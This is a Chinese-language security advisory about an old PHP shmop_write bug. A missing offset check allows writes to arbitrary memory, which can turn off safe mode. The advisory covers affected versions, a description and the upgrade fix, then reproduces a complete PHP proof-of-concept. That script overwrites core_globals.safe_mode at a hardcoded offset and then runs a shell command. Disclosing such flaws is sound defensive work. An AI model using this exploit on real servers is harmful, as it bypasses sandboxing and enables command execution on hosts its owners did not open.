消息来源:http://www.net-security.org/vuln.php?id=3917

漏洞标题:Php shmop写任意内存，安全模式被绕过。

影响版本:低于5.02与4.39并且装载了shmop模块的Php版本。

漏洞摘要:
当shmop_write函数检查offset边界有问题会导致共享内存的php模块内存信息泄露。这个漏洞可能导致绕过安全模式或者更糟。

漏洞描述:
在PHP_FUNCTION(shmop_write)的shmop.c函数没有检查offset的值是不是无效的，所以他可能通过memcpy(shmop->addr + offset, data, writesize);
覆盖任意的内存地址。这可能被用来使安全模式关闭。这里有一个概念性证明该漏洞，你需要得到core_globals.safe_mode的地址并且在$offset里正确设置。当然shmop需要被作为模块装载或者嵌入到Php bins中。
解决办法:
升级Php到5.0.3或者4.3.10。

["safe_mode_bypass.php" (绕过安全模式.php)]

<?
/*
Php Safe_mode Bypass Proof of concept.

Copyright 2004 Stefano Di Paola stefano.dipaola[at]wisec.it

Disclaimer: The author is not responsible of any damage this script can cause

*/

$shm_id = shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) {
echo "Couldn't create shared memory segment/n";
die;
}

// $data="/x01";
// the new value for safe_mode
$data="/x00";

// this (-3842685) is my offset to reach core_globals.safe_mode
// taken with gdb. (0x40688d83)
$offset=-3842685;
// Lets write the new value at our offset.
$shm_bytes_written = shmop_write($shm_id, $data, $offset );
if ($shm_bytes_written != strlen($data)) {
echo "Couldn't write the entire length of data/n";
}

//Now lets delete the block and close the shared memory segment
if (!shmop_delete($shm_id)) {
echo "Couldn't mark shared memory block for deletion.";
}
shmop_close($shm_id);

// Let's try if safe mode has been set to off
echo passthru("id");
dl("shmop.so");
?>